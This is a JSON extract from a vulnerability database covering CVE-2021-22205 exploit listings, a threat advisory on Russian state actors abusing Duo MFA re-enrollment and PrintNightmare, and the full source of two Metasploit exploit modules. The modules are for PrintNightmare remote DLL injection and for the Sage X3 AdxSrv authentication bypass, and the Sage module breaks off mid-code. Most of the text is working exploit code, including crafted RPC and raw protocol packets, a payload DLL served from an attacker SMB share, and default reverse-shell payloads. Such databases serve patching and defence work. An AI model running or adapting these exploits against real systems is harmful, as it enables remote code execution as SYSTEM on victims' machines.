"AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-06T17:06:31", "description": "# GitLab-CVE-2021-22205-scanner\n\n## Usage\n\n $~ python3 GitLab...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, 
"published": "2021-11-09T18:19:43", "type": "githubexploit", "title": "Exploit for Code Injection in Gitlab", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22205"], "modified": "2023-04-22T21:31:42", "id": "283DB4E7-F12E-5601-8E71-19E597504268", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-06T17:38:55", "description": "# gitlab-cve-2021-22205\nA simple bash script that exploits CVE-2...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-11-01T15:19:01", "type": "githubexploit", "title": "Exploit for Code Injection in Gitlab", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22205"], "modified": "2023-11-06T00:16:03", "id": "3A189A7D-D603-5FC3-8F3F-0AE71F99FA2B", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-06T14:36:06", "description": "# CVE-2021-22205\n\u7531\u4e8eGitlab\u672a\u6b63\u786e\u9a8c\u8bc1\u4f20\u9012\u5230\u6587\u4ef6\u89e3\u6790\u5668\u7684\u56fe\u50cf\u6587\u4ef6\u4ece\u800c\u5bfc\u81f4\u547d\u4ee4\u6267\u884c\u3002\u653b\u51fb\u8005\u53ef\u6784\u9020\u6076\u610f\u8bf7\u6c42\u5229\u7528...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-07-20T16:57:57", "type": "githubexploit", "title": "Exploit for Code Injection in Gitlab", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22205"], "modified": "2023-09-28T11:40:56", "id": "9CD2575C-CFA0-50A4-8AEC-4BE620162F81", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-06T17:08:49", "description": "# CVE-2021-22205\nCVE-2021-22205 RCE 
\u5de5\u5177\u4ec5\u7528\u4e8e\u5206\u4eab\u4ea4\u6d41\uff0c\u5207\u52ff\u7528\u4e8e\u975e\u6388\u6743\u6d4b\u8bd5\uff0c\u5426\u5219\u4e0e\u4f5c\u8005\u65e0\u5173\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-10-31T14:34:51", "type": "githubexploit", "title": "Exploit for Code Injection in Gitlab", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22205"], "modified": "2023-09-28T11:32:49", "id": "8F450D89-6392-5E24-8649-ACA9D4C0D054", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-06T17:09:16", "description": "* CVE-2021-22205\n--------\n** Description\n - POC for CVE-2021-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": 
"2021-10-29T04:15:00", "type": "githubexploit", "title": "Exploit for Code Injection in Gitlab", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22205"], "modified": "2023-09-28T11:32:45", "id": "7216751D-367F-5D68-BBFC-F5DF2584DEC5", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "hivepro": [{"lastseen": "2022-03-22T07:28:58", "description": "THREAT LEVEL: Red. For a detailed advisory, download the pdf file here The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) have issued an alert for enterprises that Russian state-sponsored cyber attackers have obtained network access by exploiting default MFA protocols and a known vulnerability. 
Russian state-sponsored cyber attackers got initial access to the target organization by using compromising credentials and registering a new device in the organization's Duo multi-factor authentication (MFA). The actors obtained the credentials using a brute-force password guessing attack, which provided them with access to a victim account with a basic, predictable password. The victim account had been unenrolled from Duo after a long period of inactivity, but it had not been deactivated in Active Directory. The actors were able to enroll a new device for this account, satisfy the authentication requirements, and get access to the victim network since Duo's default configuration settings allow for the re-enrollment of a new device for inactive accounts. Using the stolen account, Russian state-sponsored cyber attackers gained administrator rights by exploiting the "PrintNightmare" vulnerability (CVE-2021-34527). Furthermore, the cyber actors were able to obtain required material by moving laterally to the victim's cloud storage and email accounts. The organizations can apply the following mitigations: To prevent against "fail open" and re-enrollment scenarios, enforce MFA and examine configuration restrictions. Assure that inactive accounts are deactivated consistently across the Active Directory and MFA systems. Ensure that inactive accounts are deactivated equally across Active Directory, MFA systems, and other systems. Update software such as operating systems, apps, and hardware on a regular basis. 
The Mitre TTPs used in the current attack are:TA0001 - Initial AccessTA0003 - PersistenceTA0004 - Privilege EscalationTA0005 - Defense EvasionTA0006 - Credential AccessTA0007 - DiscoveryTA0008 - Lateral MovementTA0009 - CollectionT1078: Valid AccountsT1133: External Remote ServicesT1556: Modify Authentication ProcessT1068: Exploitation for Privilege EscalationT1112: Modify RegistryT1110.001: Brute Force: Password GuessingT1003.003: OS Credential Dumping: NTDST1018: Remote System DiscoveryT1560.001: Archive Collected Data: Archive via Utility Vulnerability Details Indicators of Compromise (IoCs) Patch Link https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527 References https://www.cisa.gov/uscert/ncas/alerts/aa22-074a", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-03-18T13:58:03", "type": "hivepro", "title": "Russian threat actors leveraging misconfigured multifactor authentication to exploit PrintNightmare vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2022-03-18T13:58:03", "id": "HIVEPRO:8D09682ECAC92A6EA4B81D42F45F0233", "href": 
"https://www.hivepro.com/russian-threat-actors-leveraging-misconfigured-mfa-to-exploit-printnightmare-vulnerability/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2023-06-24T15:45:01", "description": "The print spooler service can be abused by an authenticated remote attacker to load a DLL through a crafted DCERPC request, resulting in remote code execution as NT AUTHORITY\\SYSTEM. This module uses the MS-RPRN vector which requires the Print Spooler service to be running.\n", "cvss3": {}, "published": "2022-05-16T18:56:46", "type": "metasploit", "title": "Print Spooler Remote DLL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-05-24T13:16:30", "id": "MSF:EXPLOIT-WINDOWS-DCERPC-CVE_2021_1675_PRINTNIGHTMARE-", "href": "https://www.rapid7.com/db/modules/exploit/windows/dcerpc/cve_2021_1675_printnightmare/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'windows_error'\nrequire 'ruby_smb'\nrequire 'ruby_smb/error'\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::DCERPC\n include Msf::Exploit::Remote::SMB::Client::Authenticated\n include Msf::Exploit::Remote::SMB::Server::Share\n include Msf::Exploit::Retry\n include Msf::Exploit::EXE\n include Msf::Exploit::Deprecated\n\n moved_from 'auxiliary/admin/dcerpc/cve_2021_1675_printnightmare'\n\n PrintSystem = RubySMB::Dcerpc::PrintSystem\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Print Spooler Remote DLL Injection',\n 'Description' => %q{\n The print spooler service can be abused by an authenticated remote attacker to load a DLL through a crafted\n DCERPC request, resulting in remote code execution as NT AUTHORITY\\SYSTEM. 
This module uses the MS-RPRN\n vector which requires the Print Spooler service to be running.\n },\n 'Author' => [\n 'Zhiniang Peng', # vulnerability discovery / research\n 'Xuefeng Li', # vulnerability discovery / research\n 'Zhipeng Huo', # vulnerability discovery\n 'Piotr Madej', # vulnerability discovery\n 'Zhang Yunhai', # vulnerability discovery\n 'cube0x0', # PoC\n 'Spencer McIntyre', # metasploit module\n 'Christophe De La Fuente', # metasploit module co-author\n ],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => {\n 'SRVHOST' => Rex::Socket.source_address\n },\n 'Stance' => Msf::Exploit::Stance::Aggressive,\n 'Targets' => [\n [\n 'Windows', {\n 'Platform' => 'win',\n 'Arch' => [ ARCH_X64, ARCH_X86 ]\n },\n ],\n ],\n 'DisclosureDate' => '2021-06-08',\n 'References' => [\n ['CVE', '2021-1675'],\n ['CVE', '2021-34527'],\n ['URL', 'https://github.com/cube0x0/CVE-2021-1675'],\n ['URL', 'https://web.archive.org/web/20210701042336/https://github.com/afwu/PrintNightmare'],\n ['URL', 'https://github.com/calebstewart/CVE-2021-1675/blob/main/CVE-2021-1675.ps1'],\n ['URL', 'https://github.com/byt3bl33d3r/ItWasAllADream']\n ],\n 'Notes' => {\n 'AKA' => [ 'PrintNightmare' ],\n 'Stability' => [CRASH_SERVICE_DOWN],\n 'Reliability' => [UNRELIABLE_SESSION],\n 'SideEffects' => [\n ARTIFACTS_ON_DISK # the dll will be copied to the remote server\n ]\n }\n )\n )\n\n register_advanced_options(\n [\n OptInt.new('ReconnectTimeout', [ true, 'The timeout in seconds for reconnecting to the named pipe', 10 ])\n ]\n )\n deregister_options('AutoCheck')\n end\n\n def check\n begin\n connect(backend: :ruby_smb)\n rescue Rex::ConnectionError\n return Exploit::CheckCode::Unknown('Failed to connect to the remote service.')\n end\n\n begin\n smb_login\n rescue Rex::Proto::SMB::Exceptions::LoginError\n return Exploit::CheckCode::Unknown('Failed to authenticate to the remote service.')\n end\n\n begin\n dcerpc_bind_spoolss\n rescue RubySMB::Error::UnexpectedStatusCode => e\n nt_status = 
::WindowsError::NTStatus.find_by_retval(e.status_code.value).first\n if nt_status == ::WindowsError::NTStatus::STATUS_OBJECT_NAME_NOT_FOUND\n print_error(\"The 'Print Spooler' service is disabled.\")\n end\n return Exploit::CheckCode::Safe(\"The DCERPC bind failed with error #{nt_status.name} (#{nt_status.description}).\")\n end\n\n @target_arch = dcerpc_getarch\n # see: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/e81cbc09-ab05-4a32-ae4a-8ec57b436c43\n if @target_arch == ARCH_X64\n @environment = 'Windows x64'\n elsif @target_arch == ARCH_X86\n @environment = 'Windows NT x86'\n else\n return Exploit::CheckCode::Detected('Successfully bound to the remote service.')\n end\n\n print_status(\"Target environment: Windows v#{simple.client.os_version} (#{@target_arch})\")\n\n print_status('Enumerating the installed printer drivers...')\n drivers = enum_printer_drivers(@environment)\n @driver_path = \"#{drivers.driver_path.rpartition('\\\\').first}\\\\UNIDRV.DLL\"\n vprint_status(\"Using driver path: #{@driver_path}\")\n\n print_status('Retrieving the path of the printer driver directory...')\n @config_directory = get_printer_driver_directory(@environment)\n vprint_status(\"Using driver directory: #{@config_directory}\") unless @config_directory.nil?\n\n container = driver_container(\n p_config_file: 'C:\\\\Windows\\\\System32\\\\kernel32.dll',\n p_data_file: \"\\\\??\\\\UNC\\\\127.0.0.1\\\\#{Rex::Text.rand_text_alphanumeric(4..8)}\\\\#{Rex::Text.rand_text_alphanumeric(4..8)}.dll\"\n )\n\n case add_printer_driver_ex(container)\n when nil # prevent the module from erroring out in case the response can't be mapped to a Win32 error code\n return Exploit::CheckCode::Unknown('Received unknown status code, implying the target is not vulnerable.')\n when ::WindowsError::Win32::ERROR_PATH_NOT_FOUND\n return Exploit::CheckCode::Vulnerable('Received ERROR_PATH_NOT_FOUND, implying the target is vulnerable.')\n when ::WindowsError::Win32::ERROR_BAD_NET_NAME\n 
return Exploit::CheckCode::Vulnerable('Received ERROR_BAD_NET_NAME, implying the target is vulnerable.')\n when ::WindowsError::Win32::ERROR_ACCESS_DENIED\n return Exploit::CheckCode::Safe('Received ERROR_ACCESS_DENIED implying the target is patched.')\n end\n\n Exploit::CheckCode::Detected('Successfully bound to the remote service.')\n end\n\n def run\n fail_with(Failure::BadConfig, 'Can not use an x64 payload on an x86 target.') if @target_arch == ARCH_X86 && payload.arch.first == ARCH_X64\n fail_with(Failure::NoTarget, 'Only x86 and x64 targets are supported.') if @environment.nil?\n fail_with(Failure::Unknown, 'Failed to enumerate the driver directory.') if @config_directory.nil?\n\n super\n end\n\n def setup\n if Rex::Socket.is_ip_addr?(datastore['SRVHOST']) && Rex::Socket.addr_atoi(datastore['SRVHOST']) == 0\n fail_with(Exploit::Failure::BadConfig, 'The SRVHOST option must be set to a routable IP address.')\n end\n\n super\n end\n\n def start_service\n file_name << '.dll'\n self.file_contents = generate_payload_dll\n\n super\n end\n\n def primer\n dll_path = unc\n if dll_path =~ /^\\\\\\\\([\\w:.\\[\\]]+)\\\\(.*)$/\n # targets patched for CVE-2021-34527 (but with Point and Print enabled) need to use this path style as a bypass\n # otherwise the operation will fail with ERROR_INVALID_PARAMETER\n dll_path = \"\\\\??\\\\UNC\\\\#{Regexp.last_match(1)}\\\\#{Regexp.last_match(2)}\"\n end\n vprint_status(\"Using DLL path: #{dll_path}\")\n\n filename = dll_path.rpartition('\\\\').last\n container = driver_container(p_config_file: 'C:\\\\Windows\\\\System32\\\\kernel32.dll', p_data_file: dll_path)\n\n 3.times do\n add_printer_driver_ex(container)\n end\n\n 1.upto(3) do |directory|\n container.driver_info.p_config_file.assign(\"#{@config_directory}\\\\3\\\\old\\\\#{directory}\\\\#(unknown)\")\n break if add_printer_driver_ex(container).nil?\n end\n\n cleanup_service\n end\n\n def driver_container(**kwargs)\n PrintSystem::DriverContainer.new(\n level: 2,\n tag: 2,\n 
driver_info: PrintSystem::DriverInfo2.new(\n c_version: 3,\n p_name_ref_id: 0x00020000,\n p_environment_ref_id: 0x00020004,\n p_driver_path_ref_id: 0x00020008,\n p_data_file_ref_id: 0x0002000c,\n p_config_file_ref_id: 0x00020010,\n # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913\n p_name: \"#{Rex::Text.rand_text_alpha_upper(2..4)} #{Rex::Text.rand_text_numeric(2..3)}\",\n p_environment: @environment,\n p_driver_path: @driver_path,\n **kwargs\n )\n )\n end\n\n def dcerpc_bind_spoolss\n handle = dcerpc_handle(PrintSystem::UUID, '1.0', 'ncacn_np', ['\\\\spoolss'])\n vprint_status(\"Binding to #{handle} ...\")\n dcerpc_bind(handle)\n vprint_status(\"Bound to #{handle} ...\")\n end\n\n def enum_printer_drivers(environment)\n response = rprn_call('RpcEnumPrinterDrivers', p_environment: environment, level: 2)\n response = rprn_call('RpcEnumPrinterDrivers', p_environment: environment, level: 2, p_drivers: [0] * response.pcb_needed, cb_buf: response.pcb_needed)\n fail_with(Failure::UnexpectedReply, 'Failed to enumerate printer drivers.') unless response.p_drivers&.length\n DriverInfo2.read(response.p_drivers.map(&:chr).join)\n end\n\n def get_printer_driver_directory(environment)\n response = rprn_call('RpcGetPrinterDriverDirectory', p_environment: environment, level: 2)\n response = rprn_call('RpcGetPrinterDriverDirectory', p_environment: environment, level: 2, p_driver_directory: [0] * response.pcb_needed, cb_buf: response.pcb_needed)\n fail_with(Failure::UnexpectedReply, 'Failed to obtain the printer driver directory.') unless response.p_driver_directory&.length\n RubySMB::Field::Stringz16.read(response.p_driver_directory.map(&:chr).join).encode('ASCII-8BIT')\n end\n\n def add_printer_driver_ex(container)\n flags = PrintSystem::APD_INSTALL_WARNED_DRIVER | PrintSystem::APD_COPY_FROM_DIRECTORY | PrintSystem::APD_COPY_ALL_FILES\n\n begin\n response = rprn_call('RpcAddPrinterDriverEx', p_name: 
\"\\\\\\\\#{datastore['RHOST']}\", p_driver_container: container, dw_file_copy_flags: flags)\n rescue RubySMB::Error::UnexpectedStatusCode => e\n nt_status = ::WindowsError::NTStatus.find_by_retval(e.status_code.value).first\n message = \"Error #{nt_status.name} (#{nt_status.description})\"\n if nt_status == ::WindowsError::NTStatus::STATUS_PIPE_BROKEN\n # STATUS_PIPE_BROKEN is the return value when the payload is executed, so this is somewhat expected\n print_status('The named pipe connection was broken, reconnecting...')\n reconnected = retry_until_truthy(timeout: datastore['ReconnectTimeout'].to_i) do\n dcerpc_bind_spoolss\n rescue RubySMB::Error::CommunicationError, RubySMB::Error::UnexpectedStatusCode => e\n false\n else\n true\n end\n\n unless reconnected\n vprint_status('Failed to reconnect to the named pipe.')\n return nil\n end\n\n print_status('Successfully reconnected to the named pipe.')\n retry\n else\n print_error(message)\n end\n\n return nt_status\n end\n\n error = ::WindowsError::Win32.find_by_retval(response.error_status.value).first\n message = \"RpcAddPrinterDriverEx response #{response.error_status}\"\n message << \" #{error.name} (#{error.description})\" unless error.nil?\n vprint_status(message)\n error\n end\n\n def rprn_call(name, **kwargs)\n request = PrintSystem.const_get(\"#{name}Request\").new(**kwargs)\n\n begin\n raw_response = dcerpc.call(request.opnum, request.to_binary_s)\n rescue Rex::Proto::DCERPC::Exceptions::Fault => e\n fail_with(Failure::UnexpectedReply, \"The #{name} Print System RPC request failed (#{e.message}).\")\n end\n\n PrintSystem.const_get(\"#{name}Response\").read(raw_response)\n end\n\n class DriverInfo2Header < BinData::Record\n endian :little\n\n uint32 :c_version\n uint32 :name_offset\n uint32 :environment_offset\n uint32 :driver_path_offset\n uint32 :data_file_offset\n uint32 :config_file_offset\n end\n\n # this is a partial implementation that just parses the data, this is *not* the same struct as 
PrintSystem::DriverInfo2\n # see: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/2825d22e-c5a5-47cd-a216-3e903fd6e030\n DriverInfo2 = Struct.new(:header, :name, :environment, :driver_path, :data_file, :config_file) do\n def self.read(data)\n header = DriverInfo2Header.read(data)\n new(\n header,\n RubySMB::Field::Stringz16.read(data[header.name_offset..]).encode('ASCII-8BIT'),\n RubySMB::Field::Stringz16.read(data[header.environment_offset..]).encode('ASCII-8BIT'),\n RubySMB::Field::Stringz16.read(data[header.driver_path_offset..]).encode('ASCII-8BIT'),\n RubySMB::Field::Stringz16.read(data[header.data_file_offset..]).encode('ASCII-8BIT'),\n RubySMB::Field::Stringz16.read(data[header.config_file_offset..]).encode('ASCII-8BIT')\n )\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/dcerpc/cve_2021_1675_printnightmare.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-21T01:09:48", "description": "This module leverages an authentication bypass exploit within Sage X3 AdxSrv's administration protocol to execute arbitrary commands as SYSTEM against a Sage X3 Server running an available AdxAdmin service.\n", "cvss3": {}, "published": "2021-07-21T01:07:08", "type": "metasploit", "title": "Sage X3 Administration Service Authentication Bypass Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-7387"], "modified": "2021-08-27T16:19:43", "id": "MSF:EXPLOIT-WINDOWS-SAGE-X3_ADXSRV_AUTH_BYPASS_CMD_EXEC-", "href": "https://www.rapid7.com/db/modules/exploit/windows/sage/x3_adxsrv_auth_bypass_cmd_exec/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def 
initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Sage X3 Administration Service Authentication Bypass Command Execution',\n 'Description' => %q{\n This module leverages an authentication bypass exploit within Sage X3 AdxSrv's administration\n protocol to execute arbitrary commands as SYSTEM against a Sage X3 Server running an\n available AdxAdmin service.\n },\n 'Author' => [\n 'Jonathan Peterson <deadjakk[at]shell.rip>', # @deadjakk\n 'Aaron Herndon' # @ac3lives\n ],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => '2021-07-07',\n 'References' => [\n ['CVE', '2020-7387'], # Infoleak\n ['CVE', '2020-7388'], # RCE\n ['URL', 'https://www.rapid7.com/blog/post/2021/07/07/cve-2020-7387-7390-multiple-sage-x3-vulnerabilities/']\n ],\n 'Privileged' => true,\n 'Platform' => 'win',\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Targets' => [\n [\n 'Windows Command',\n {\n 'Arch' => ARCH_CMD,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/windows/generic',\n 'CMD' => 'whoami'\n }\n }\n ],\n [\n 'Windows DLL',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n }\n }\n ],\n [\n 'Windows Executable',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [FIRST_ATTEMPT_FAIL],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options(\n [\n Opt::RPORT(1818)\n ]\n )\n end\n\n def vprint(msg = '')\n print(msg) if datastore['VERBOSE']\n end\n\n def check\n s = connect\n print_status('Connected')\n\n # ADXDIR command authentication header\n # allows for unauthenticated retrieval of X3 directory\n auth_packet = \"\\x09\\x00\"\n s.write(auth_packet)\n\n # recv response\n res = s.read(1024)\n\n if res.nil? 
|| res.length != 4\n print_bad('ADXDIR authentication failed')\n return CheckCode::Safe\n end\n\n if res.chars == [\"\\xFF\", \"\\xFF\", \"\\xFF\", \"\\xFF\"]\n print_bad('ADXDIR authentication failed')\n return CheckCode::Safe\n end\n\n print_good('ADXDIR authentication successful.')\n\n # ADXDIR command\n adx_dir_msg = \"\\x07\\x41\\x44\\x58\\x44\\x49\\x52\\x00\"\n s.write(adx_dir_msg)\n directory = s.read(1024)\n\n return CheckCode::Safe if directory.nil?\n\n sagedir = directory[4..-2]\n print_good(format('Received directory info from host: %s', sagedir))\n disconnect\n\n CheckCode::Vulnerable(details: { sagedir: sagedir })\n rescue Rex::ConnectionError\n CheckCode::Unknown\n end\n\n def build_buffer(head, sage_payload, tail)\n buffer = ''\n\n # do things\n buffer << head if head\n buffer << sage_payload.length\n buffer << sage_payload\n buffer << tail if tail\n\n buffer\n end\n\n def write_file(sock, filenum, sage_payload, target, sagedir)\n s = sock\n\n # building the initial authentication packet\n # [2bytes][userlen 1 byte][username][userlen 1 byte][username][passlen 1 byte][CRYPT:HASH]\n # Note: the first byte of this auth packet is different from the ADXDIR command\n\n revsagedir = sagedir.gsub('\\\\', '/')\n\n s.write(\"\\x06\\x00\")\n auth_resp = s.read(1024)\n\n fail_with(Failure::UnexpectedReply, 'Directory message did not provide intended response') if auth_resp.length != 4\n\n print_good('Command authentication successful.')\n\n # May require additional information such as file path\n # this will be used for multiple messages\n\n head = \"\\x00\\x00\\x36\\x02\\x00\\x2e\\x00\" # head\n fmt = '@%s/tmp/cmd%s$cmd'\n fmt = '@%s/tmp/cmd%s.dll' if target == 'Windows DLL'\n fmt = '@%s/tmp/cmd%s.exe' if target == 'Windows Executable'\n pload = format(fmt, revsagedir, filenum)\n tail = \"\\x00\\x03\\x00\\x01\\x77\"\n sendbuf = build_buffer(head, pload, tail)\n s.write(sendbuf)\n s.read(1024)\n\n # Packet --- 3\n # Creating the packet that contains the command 
